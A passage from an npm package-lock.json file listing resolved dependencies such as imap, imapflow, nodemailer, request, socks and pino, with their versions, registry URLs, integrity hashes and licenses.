"MIT", 922 | "dependencies": { 923 | "assert-plus": "^1.0.0", 924 | "jsprim": "^1.2.2", 925 | "sshpk": "^1.7.0" 926 | }, 927 | "engines": { 928 | "node": ">=0.8", 929 | "npm": ">=1.3.7" 930 | } 931 | }, 932 | "node_modules/http2-wrapper": { 933 | "version": "1.0.3", 934 | "resolved": "https://registry.npmjs.org/http2-wrapper/-/http2-wrapper-1.0.3.tgz", 935 | "integrity": "sha512-V+23sDMr12Wnz7iTcDeJr3O6AIxlnvT/bmaAAAP/Xda35C90p9599p0F1eHR/N1KILWSoWVAiOMFjBBXaXSMxg==", 936 | "dependencies": { 937 | "quick-lru": "^5.1.1", 938 | "resolve-alpn": "^1.0.0" 939 | }, 940 | "engines": { 941 | "node": ">=10.19.0" 942 | } 943 | }, 944 | "node_modules/https-proxy-agent": { 945 | "version": "7.0.6", 946 | "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", 947 | "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", 948 | "license": "MIT", 949 | "dependencies": { 950 | "agent-base": "^7.1.2", 951 | "debug": "4" 952 | }, 953 | "engines": { 954 | "node": ">= 14" 955 | } 956 | }, 957 | "node_modules/iconv-lite": { 958 | "version": "0.6.3", 959 | "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", 960 | "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", 961 | "license": "MIT", 962 | "dependencies": { 963 | "safer-buffer": ">= 2.1.2 < 3.0.0" 964 | }, 965 | "engines": { 966 | "node": ">=0.10.0" 967 | } 968 | }, 969 | "node_modules/imap": { 970 | "version": "0.8.19", 971 | "resolved": "https://registry.npmjs.org/imap/-/imap-0.8.19.tgz", 972 | "integrity": "sha512-z5DxEA1uRnZG73UcPA4ES5NSCGnPuuouUx43OPX7KZx1yzq3N8/vx2mtXEShT5inxB3pRgnfG1hijfu7XN2YMw==", 973 | "dependencies": { 974 | "readable-stream": "1.1.x", 975 | "utf7": ">=1.0.2" 976 | }, 977 | "engines": { 978 | "node": ">=0.8.0" 979 | } 980 | }, 981 | "node_modules/imapflow": { 982 | "version": "1.0.177", 983 | "resolved": "https://registry.npmjs.org/imapflow/-/imapflow-1.0.177.tgz", 984 | "integrity": "sha512-FXM2wR3eD7YyrvvUif/0C3IGhpGuHhCASqRWWz4+1EcbwdySefayWahkRe43dF61XEYxhwbWhD39LbAwJxxX1g==", 985 | "license": "MIT", 986 | "dependencies": { 987 | "encoding-japanese": "2.2.0", 988 | "iconv-lite": "0.6.3", 989 | "libbase64": "1.3.0", 990 | "libmime": "5.3.6", 991 | "libqp": "2.1.1", 992 | "mailsplit": "5.4.2", 993 | "nodemailer": "6.9.16", 994 | "pino": "9.6.0", 995 | "socks": "2.8.3" 996 | } 997 | }, 998 | "node_modules/inherits": { 999 | "version": "2.0.4", 1000 | "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", 1001 | "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", 1002 | "license": "ISC" 1003 | }, 1004 | "node_modules/ip-address": { 1005 | "version": "9.0.5", 1006 | "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", 1007 | "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", 1008 | "license": "MIT", 1009 | "dependencies": { 1010 | "jsbn": "1.1.0", 1011 | "sprintf-js": "^1.1.3" 1012 | }, 1013 | "engines": { 1014 | "node": ">= 12" 1015 | } 1016 | }, 1017 | "node_modules/is-typedarray": { 1018 | "version": "1.0.0", 1019 | "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 1020 | "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==", 1021 | "license": "MIT" 1022 | }, 1023 | "node_modules/isarray": { 1024 | "version": "0.0.1", 1025 | "resolved": "https://registry.npmjs.org/isarray/-/isarray-0.0.1.tgz", 1026 | "integrity": "sha512-D2S+3GLxWH+uhrNEcoh/fnmYeP8E8/zHl644d/jdA0g2uyXvy3sb0qxotE+ne0LtccHknQzWwZEzhak7oJ0COQ==", 1027 | "license": "MIT" 1028 | }, 1029 | "node_modules/isstream": { 1030 | "version": "0.1.2", 1031 | "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", 1032 | "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==", 1033 | "license": "MIT" 1034 | }, 1035 | "node_modules/jsbn": { 1036 | "version": "1.1.0", 1037 | "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", 1038 | "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", 1039 | "license": "MIT" 1040 | }, 1041 | "node_modules/json-buffer": { 1042 | "version": "3.0.1", 1043 | "resolved": "https://registry.npmjs.org/json-buffer/-/json-buffer-3.0.1.tgz", 1044 | "integrity": "sha512-4bV5BfR2mqfQTJm+V5tPPdf+ZpuhiIvTuAB5g8kcrXOZpTT/QwwVRWBywX1ozr6lEuPdbHxwaJlm9G6mI2sfSQ==" 1045 | }, 1046 | "node_modules/json-schema": { 1047 | "version": "0.4.0", 1048 | "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", 1049 | "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", 1050 | "license": "(AFL-2.1 OR BSD-3-Clause)" 1051 | }, 1052 | "node_modules/json-schema-traverse": { 1053 | "version": "0.4.1", 1054 | "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", 1055 | "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", 1056 | "license": "MIT" 1057 | }, 1058 | "node_modules/json-stringify-safe": { 1059 | "version": "5.0.1", 1060 | "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", 1061 | "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==", 1062 | "license": "ISC" 1063 | }, 1064 | "node_modules/jsprim": { 1065 | "version": "1.4.2", 1066 | "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", 1067 | "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", 1068 | "license": "MIT", 1069 | "dependencies": { 1070 | "assert-plus": "1.0.0", 1071 | "extsprintf": "1.3.0", 1072 | "json-schema": "0.4.0", 1073 | "verror": "1.10.0" 1074 | }, 1075 | "engines": { 1076 | "node": ">=0.6.0" 1077 | } 1078 | }, 1079 | "node_modules/keyv": { 1080 | "version": "4.5.4", 1081 | "resolved": "https://registry.npmjs.org/keyv/-/keyv-4.5.4.tgz", 1082 | "integrity": "sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==", 1083 | "dependencies": { 1084 | "json-buffer": "3.0.1" 1085 | } 1086 | }, 1087 | "node_modules/libbase64": { 1088 | "version": "1.3.0", 1089 | "resolved": "https://registry.npmjs.org/libbase64/-/libbase64-1.3.0.tgz", 1090 | "integrity": "sha512-GgOXd0Eo6phYgh0DJtjQ2tO8dc0IVINtZJeARPeiIJqge+HdsWSuaDTe8ztQ7j/cONByDZ3zeB325AHiv5O0dg==", 1091 | "license": "MIT" 1092 | }, 1093 | "node_modules/libmime": { 1094 | "version": "5.3.6", 1095 | "resolved": "https://registry.npmjs.org/libmime/-/libmime-5.3.6.tgz", 1096 | "integrity": "sha512-j9mBC7eiqi6fgBPAGvKCXJKJSIASanYF4EeA4iBzSG0HxQxmXnR3KbyWqTn4CwsKSebqCv2f5XZfAO6sKzgvwA==", 1097 | "license": "MIT", 1098 | "dependencies": { 1099 | "encoding-japanese": "2.2.0", 1100 | "iconv-lite": "0.6.3", 1101 | "libbase64": "1.3.0", 1102 | "libqp": "2.1.1" 1103 | } 1104 | }, 1105 | "node_modules/libqp": { 1106 | "version": "2.1.1", 1107 | "resolved": "https://registry.npmjs.org/libqp/-/libqp-2.1.1.tgz", 1108 | "integrity": "sha512-0Wd+GPz1O134cP62YU2GTOPNA7Qgl09XwCqM5zpBv87ERCXdfDtyKXvV7c9U22yWJh44QZqBocFnXN11K96qow==", 1109 | "license": "MIT" 1110 | }, 1111 | "node_modules/lowercase-keys": { 1112 | "version": "2.0.0", 1113 | "resolved": "https://registry.npmjs.org/lowercase-keys/-/lowercase-keys-2.0.0.tgz", 1114 | "integrity": "sha512-tqNXrS78oMOE73NMxK4EMLQsQowWf8jKooH9g7xPavRT706R6bkQJ6DY2Te7QukaZsulxa30wQ7bk0pm4XiHmA==", 1115 | "engines": { 1116 | "node": ">=8" 1117 | } 1118 | }, 1119 | "node_modules/mailsplit": { 1120 | "version": "5.4.2", 1121 | "resolved": "https://registry.npmjs.org/mailsplit/-/mailsplit-5.4.2.tgz", 1122 | "integrity": "sha512-4cczG/3Iu3pyl8JgQ76dKkisurZTmxMrA4dj/e8d2jKYcFTZ7MxOzg1gTioTDMPuFXwTrVuN/gxhkrO7wLg7qA==", 1123 | "license": "(MIT OR EUPL-1.1+)", 1124 | "dependencies": { 1125 | "libbase64": "1.3.0", 1126 | "libmime": "5.3.6", 1127 | "libqp": "2.1.1" 1128 | } 1129 | }, 1130 | "node_modules/mime-db": { 1131 | "version": "1.52.0", 1132 | "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", 1133 | "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", 1134 | "license": "MIT", 1135 | "engines": { 1136 | "node": ">= 0.6" 1137 | } 1138 | }, 1139 | "node_modules/mime-types": { 1140 | "version": "2.1.35", 1141 | "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", 1142 | "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", 1143 | "license": "MIT", 1144 | "dependencies": { 1145 | "mime-db": "1.52.0" 1146 | }, 1147 | "engines": { 1148 | "node": ">= 0.6" 1149 | } 1150 | }, 1151 | "node_modules/mimic-response": { 1152 | "version": "1.0.1", 1153 | "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-1.0.1.tgz", 1154 | "integrity": "sha512-j5EctnkH7amfV/q5Hgmoal1g2QHFJRraOtmx0JpIqkxhBhI/lJSl1nMpQ45hVarwNETOoWEimndZ4QK0RHxuxQ==", 1155 | "engines": { 1156 | "node": ">=4" 1157 | } 1158 | }, 1159 | "node_modules/ms": { 1160 | "version": "2.1.3", 1161 | "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", 1162 | "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", 1163 | "license": "MIT" 1164 | }, 1165 | "node_modules/nodemailer": { 1166 | "version": "6.9.16", 1167 | "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.16.tgz", 1168 | "integrity": "sha512-psAuZdTIRN08HKVd/E8ObdV6NO7NTBY3KsC30F7M4H1OnmLCUNaS56FpYxyb26zWLSyYF9Ozch9KYHhHegsiOQ==", 1169 | "license": "MIT-0", 1170 | "engines": { 1171 | "node": ">=6.0.0" 1172 | } 1173 | }, 1174 | "node_modules/normalize-url": { 1175 | "version": "6.1.0", 1176 | "resolved": "https://registry.npmjs.org/normalize-url/-/normalize-url-6.1.0.tgz", 1177 | "integrity": "sha512-DlL+XwOy3NxAQ8xuC0okPgK46iuVNAK01YN7RueYBqqFeGsBjV9XmCAzAdgt+667bCl5kPh9EqKKDwnaPG1I7A==", 1178 | "engines": { 1179 | "node": ">=10" 1180 | }, 1181 | "funding": { 1182 | "url": "https://github.com/sponsors/sindresorhus" 1183 | } 1184 | }, 1185 | "node_modules/oauth-sign": { 1186 | "version": "0.9.0", 1187 | "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", 1188 | "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", 1189 | "license": "Apache-2.0", 1190 | "engines": { 1191 | "node": "*" 1192 | } 1193 | }, 1194 | "node_modules/on-exit-leak-free": { 1195 | "version": "2.1.2", 1196 | "resolved": "https://registry.npmjs.org/on-exit-leak-free/-/on-exit-leak-free-2.1.2.tgz", 1197 | "integrity": "sha512-0eJJY6hXLGf1udHwfNftBqH+g73EU4B504nZeKpz1sYRKafAghwxEJunB2O7rDZkL4PGfsMVnTXZ2EjibbqcsA==", 1198 | "license": "MIT", 1199 | "engines": { 1200 | "node": ">=14.0.0" 1201 | } 1202 | }, 1203 | "node_modules/once": { 1204 | "version": "1.4.0", 1205 | "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", 1206 | "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", 1207 | "dependencies": { 1208 | "wrappy": "1" 1209 | } 1210 | }, 1211 | "node_modules/p-cancelable": { 1212 | "version": "2.1.1", 1213 | "resolved": "https://registry.npmjs.org/p-cancelable/-/p-cancelable-2.1.1.tgz", 1214 | "integrity": "sha512-BZOr3nRQHOntUjTrH8+Lh54smKHoHyur8We1V8DSMVrl5A2malOOwuJRnKRDjSnkoeBh4at6BwEnb5I7Jl31wg==", 1215 | "engines": { 1216 | "node": ">=8" 1217 | } 1218 | }, 1219 | "node_modules/performance-now": { 1220 | "version": "2.1.0", 1221 | "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", 1222 | "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==", 1223 | "license": "MIT" 1224 | }, 1225 | "node_modules/pino": { 1226 | "version": "9.6.0", 1227 | "resolved": "https://registry.npmjs.org/pino/-/pino-9.6.0.tgz", 1228 | "integrity": "sha512-i85pKRCt4qMjZ1+L7sy2Ag4t1atFcdbEt76+7iRJn1g2BvsnRMGu9p8pivl9fs63M2kF/A0OacFZhTub+m/qMg==", 1229 | "license": "MIT", 1230 | "dependencies": { 1231 | "atomic-sleep": "^1.0.0", 1232 | "fast-redact": "^3.1.1", 1233 | "on-exit-leak-free": "^2.1.0", 1234 | "pino-abstract-transport": "^2.0.0", 1235 | "pino-std-serializers": "^7.0.0", 1236 | "process-warning": "^4.0.0", 1237 | "quick-format-unescaped": "^4.0.3", 1238 | "real-require": "^0.2.0", 1239 | "safe-stable-stringify": "^2.3.1", 1240 | "sonic-boom": "^4.0.1", 1241 | "thread-stream": "^3.0.0" 1242 | }, 1243 | "bin": { 1244 | "pino": "bin.js" 1245 | } 1246 | }, 1247 | "node_modules/pino-abstract-transport": { 1248 | "version": "2.0.0", 1249 | "resolved": "https://registry.npmjs.org/pino-abstract-transport/-/pino-abstract-transport-2.0.0.tgz", 1250 | "integrity": "sha512-F63x5tizV6WCh4R6RHyi2Ml+M70DNRXt/+HANowMflpgGFMAym/VKm6G7ZOQRjqN7XbGxK1Lg9t6ZrtzOaivMw==", 1251 | "license": "MIT", 1252 | "dependencies": { 1253 | "split2": "^4.0.0" 1254 | } 1255 | }, 1256 | "node_modules/pino-std-serializers": { 1257 | "version": "7.0.0", 1258 | "resolved": "https://registry.npmjs.org/pino-std-serializers/-/pino-std-serializers-7.0.0.tgz", 1259 | "integrity": "sha512-e906FRY0+tV27iq4juKzSYPbUj2do2X2JX4EzSca1631EB2QJQUqGbDuERal7LCtOpxl6x3+nvo9NPZcmjkiFA==", 1260 | "license": "MIT" 1261 | }, 1262 | "node_modules/process-warning": { 1263 | "version": "4.0.1", 1264 | "resolved": "https://registry.npmjs.org/process-warning/-/process-warning-4.0.1.tgz", 1265 | "integrity": "sha512-3c2LzQ3rY9d0hc1emcsHhfT9Jwz0cChib/QN89oME2R451w5fy3f0afAhERFZAwrbDU43wk12d0ORBpDVME50Q==", 1266 | "funding": [ 1267 | { 1268 | "type": "github", 1269 | "url": "https://github.com/sponsors/fastify" 1270 | }, 1271 | { 1272 | "type": "opencollective", 1273 | "url": "https://opencollective.com/fastify" 1274 | } 1275 | ], 1276 | "license": "MIT" 1277 | }, 1278 | "node_modules/psl": { 1279 | "version": "1.15.0", 1280 | "resolved": "https://registry.npmjs.org/psl/-/psl-1.15.0.tgz", 1281 | "integrity": "sha512-JZd3gMVBAVQkSs6HdNZo9Sdo0LNcQeMNP3CozBJb3JYC/QUYZTnKxP+f8oWRX4rHP5EurWxqAHTSwUCjlNKa1w==", 1282 | "license": "MIT", 1283 | "dependencies": { 1284 | "punycode": "^2.3.1" 1285 | }, 1286 | "funding": { 1287 | "url": "https://github.com/sponsors/lupomontero" 1288 | } 1289 | }, 1290 | "node_modules/pump": { 1291 | "version": "3.0.2", 1292 | "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", 1293 | "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", 1294 | "dependencies": { 1295 | "end-of-stream": "^1.1.0", 1296 | "once": "^1.3.1" 1297 | } 1298 | }, 1299 | "node_modules/punycode": { 1300 | "version": "2.3.1", 1301 | "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", 1302 | "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", 1303 | "license": "MIT", 1304 | "engines": { 1305 | "node": ">=6" 1306 | } 1307 | }, 1308 | "node_modules/qs": { 1309 | "version": "6.5.3", 1310 | "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", 1311 | "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", 1312 | "license": "BSD-3-Clause", 1313 | "engines": { 1314 | "node": ">=0.6" 1315 | } 1316 | }, 1317 | "node_modules/quick-format-unescaped": { 1318 | "version": "4.0.4", 1319 | "resolved": "https://registry.npmjs.org/quick-format-unescaped/-/quick-format-unescaped-4.0.4.tgz", 1320 | "integrity": "sha512-tYC1Q1hgyRuHgloV/YXs2w15unPVh8qfu/qCTfhTYamaw7fyhumKa2yGpdSo87vY32rIclj+4fWYQXUMs9EHvg==", 1321 | "license": "MIT" 1322 | }, 1323 | "node_modules/quick-lru": { 1324 | "version": "5.1.1", 1325 | "resolved": "https://registry.npmjs.org/quick-lru/-/quick-lru-5.1.1.tgz", 1326 | "integrity": "sha512-WuyALRjWPDGtt/wzJiadO5AXY+8hZ80hVpe6MyivgraREW751X3SbhRvG3eLKOYN+8VEvqLcf3wdnt44Z4S4SA==", 1327 | "engines": { 1328 | "node": ">=10" 1329 | }, 1330 | "funding": { 1331 | "url": "https://github.com/sponsors/sindresorhus" 1332 | } 1333 | }, 1334 | "node_modules/readable-stream": { 1335 | "version": "1.1.14", 1336 | "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-1.1.14.tgz", 1337 | "integrity": "sha512-+MeVjFf4L44XUkhM1eYbD8fyEsxcV81pqMSR5gblfcLCHfZvbrqy4/qYHE+/R5HoBUT11WV5O08Cr1n3YXkWVQ==", 1338 | "license": "MIT", 1339 | "dependencies": { 1340 | "core-util-is": "~1.0.0", 1341 | "inherits": "~2.0.1", 1342 | "isarray": "0.0.1", 1343 | "string_decoder": "~0.10.x" 1344 | } 1345 | }, 1346 | "node_modules/real-require": { 1347 | "version": "0.2.0", 1348 | "resolved": "https://registry.npmjs.org/real-require/-/real-require-0.2.0.tgz", 1349 | "integrity": "sha512-57frrGM/OCTLqLOAh0mhVA9VBMHd+9U7Zb2THMGdBUoZVOtGbJzjxsYGDJ3A9AYYCP4hn6y1TVbaOfzWtm5GFg==", 1350 | "license": "MIT", 1351 | "engines": { 1352 | "node": ">= 12.13.0" 1353 | } 1354 | }, 1355 | "node_modules/request": { 1356 | "version": "2.88.2", 1357 | "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", 1358 | "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", 1359 | "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", 1360 | "license": "Apache-2.0", 1361 | "dependencies": { 1362 | "aws-sign2": "~0.7.0", 1363 | "aws4": "^1.8.0", 1364 | "caseless": "~0.12.0", 1365 | "combined-stream": "~1.0.6", 1366 | "extend": "~3.0.2", 1367 | "forever-agent": "~0.6.1", 1368 | "form-data": "~2.3.2", 1369 | "har-validator": "~5.1.3", 1370 | "http-signature": "~1.2.0", 1371 | "is-typedarray": "~1.0.0", 1372 | "isstream": "~0.1.2", 1373 | "json-stringify-safe": "~5.0.1", 1374 | "mime-types": "~2.1.19", 1375 | "oauth-sign": "~0.9.0", 1376 | "performance-now": "^2.1.0", 1377 | "qs": "~6.5.2", 1378 | "safe-buffer": "^5.1.2", 1379 | "tough-cookie": "~2.5.0", 1380 | "tunnel-agent": "^0.6.0", 1381 | "uuid": "^3.3.2" 1382 | }, 1383 | "engines": { 1384 | "node": ">= 6" 1385 | } 1386 | }, 1387 | "node_modules/request/node_modules/form-data": { 1388 | "version": "2.3.3", 1389 | "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", 1390 | "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", 1391 | "license": "MIT", 1392 | "dependencies": { 1393 | "asynckit": "^0.4.0", 1394 | "combined-stream": "^1.0.6", 1395 | "mime-types": "^2.1.12" 1396 | }, 1397 | "engines": { 1398 | "node": ">= 0.12" 1399 | } 1400 | }, 1401 | "node_modules/request/node_modules/tough-cookie": { 1402 | "version": "2.5.0", 1403 | "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", 1404 | "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", 1405 | "license": "BSD-3-Clause", 1406 | "dependencies": { 1407 | "psl": "^1.1.28", 1408 | "punycode": "^2.1.1" 1409 | }, 1410 | "engines": { 1411 | "node": ">=0.8" 1412 | } 1413 | }, 1414 | "node_modules/resolve-alpn": { 1415 | "version": "1.2.1", 1416 | "resolved": "https://registry.npmjs.org/resolve-alpn/-/resolve-alpn-1.2.1.tgz", 1417 | "integrity": "sha512-0a1F4l73/ZFZOakJnQ3FvkJ2+gSTQWz/r2KE5OdDY0TxPm5h4GkqkWWfM47T7HsbnOtcJVEF4epCVy6u7Q3K+g==" 1418 | }, 1419 | "node_modules/responselike": { 1420 | "version": "2.0.1", 1421 | "resolved": "https://registry.npmjs.org/responselike/-/responselike-2.0.1.tgz", 1422 | "integrity": "sha512-4gl03wn3hj1HP3yzgdI7d3lCkF95F21Pz4BPGvKHinyQzALR5CapwC8yIi0Rh58DEMQ/SguC03wFj2k0M/mHhw==", 1423 | "dependencies": { 1424 | "lowercase-keys": "^2.0.0" 1425 | }, 1426 | "funding": { 1427 | "url": "https://github.com/sponsors/sindresorhus" 1428 | } 1429 | }, 1430 | "node_modules/safe-buffer": { 1431 | "version": "5.2.1", 1432 | "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", 1433 | "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", 1434 | "funding": [ 1435 | { 1436 | "type": "github", 1437 | "url": "https://github.com/sponsors/feross" 1438 | }, 1439 | { 1440 | "type": "patreon", 1441 | "url": "https://www.patreon.com/feross" 1442 | }, 1443 | { 1444 | "type": "consulting", 1445 | "url": "https://feross.org/support" 1446 | } 1447 | ], 1448 | "license": "MIT" 1449 | }, 1450 | "node_modules/safe-stable-stringify": { 1451 | "version": "2.5.0", 1452 | "resolved": "https://registry.npmjs.org/safe-stable-stringify/-/safe-stable-stringify-2.5.0.tgz", 1453 | "integrity": "sha512-b3rppTKm9T+PsVCBEOUR46GWI7fdOs00VKZ1+9c1EWDaDMvjQc6tUwuFyIprgGgTcWoVHSKrU8H31ZHA2e0RHA==", 1454 | "license": "MIT", 1455 | "engines": { 1456 | "node": ">=10" 1457 | } 1458 | }, 1459 | "node_modules/safer-buffer": { 1460 | "version": "2.1.2", 1461 | "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", 1462 | "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", 1463 | "license": "MIT" 1464 | }, 1465 | "node_modules/semver": { 1466 | "version": "5.3.0", 1467 | "resolved": "https://registry.npmjs.org/semver/-/semver-5.3.0.tgz", 1468 | "integrity": "sha512-mfmm3/H9+67MCVix1h+IXTpDwL6710LyHuk7+cWC9T1mE0qz4iHhh6r4hU2wrIT9iTsAAC2XQRvfblL028cpLw==", 1469 | "license": "ISC", 1470 | "bin": { 1471 | "semver": "bin/semver" 1472 | } 1473 | }, 1474 | "node_modules/smart-buffer": { 1475 | "version": "4.2.0", 1476 | "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", 1477 | "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", 1478 | "license": "MIT", 1479 | "engines": { 1480 | "node": ">= 6.0.0", 1481 | "npm": ">= 3.0.0" 1482 | } 1483 | }, 1484 | "node_modules/socks": { 1485 | "version": "2.8.3", 1486 | "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.3.tgz", 1487 | "integrity": "sha512-l5x7VUUWbjVFbafGLxPWkYsHIhEvmF85tbIeFZWc8ZPtoMyybuEhL7Jye/ooC4/d48FgOjSJXgsF/AJPYCW8Zw==", 1488 | "license": "MIT", 1489 | "dependencies": { 1490 | "ip-address": "^9.0.5", 1491 | "smart-buffer": "^4.2.0" 1492 | }, 1493 | "engines": { 1494 | "node": ">= 10.0.0", 1495 | "npm": ">= 3.0.0" 1496 | } 1497 | }, 1498 | "node_modules/socks-proxy-agent": { 1499 | "version": "8.0.5", 1500 | "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", 1501 | "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", 1502 | "license": "MIT", 1503 | "dependencies": { 1504 | "agent-base": "^7.1.2", 1505 | "debug": "^4.3.4", 1506 | "socks": "^2.8.3" 1507 | }, 1508 | "engines": { 1509 | "node": ">= 14" 1510 | } 1511 | }, 1512 | "node_modules/sonic-boom": { 1513 | "version": "4.2.0", 1514 | "resolved": "https://registry.npmjs.org/sonic-boom/-/sonic-boom-4.2.0.tgz", 1515 | "integrity": "sha512-INb7TM37/mAcsGmc9hyyI6+QR3rR1zVRu36B0NeGXKnOOLiZOfER5SA+N7X7k3yUYRzLWafduTDvJAfDswwEww==", 1516 | "license": "MIT", 1517 | "dependencies": { 1518 | "atomic-sleep": "^1.0.0" 1519 | } 1520 | }, 1521 | "node_modules/split2": { 1522 | "version": "4.2.0", 1523 | "resolved": "https://registry.npmjs.org/split2/-/split2-4.2.0.tgz", 1524 | "integrity": 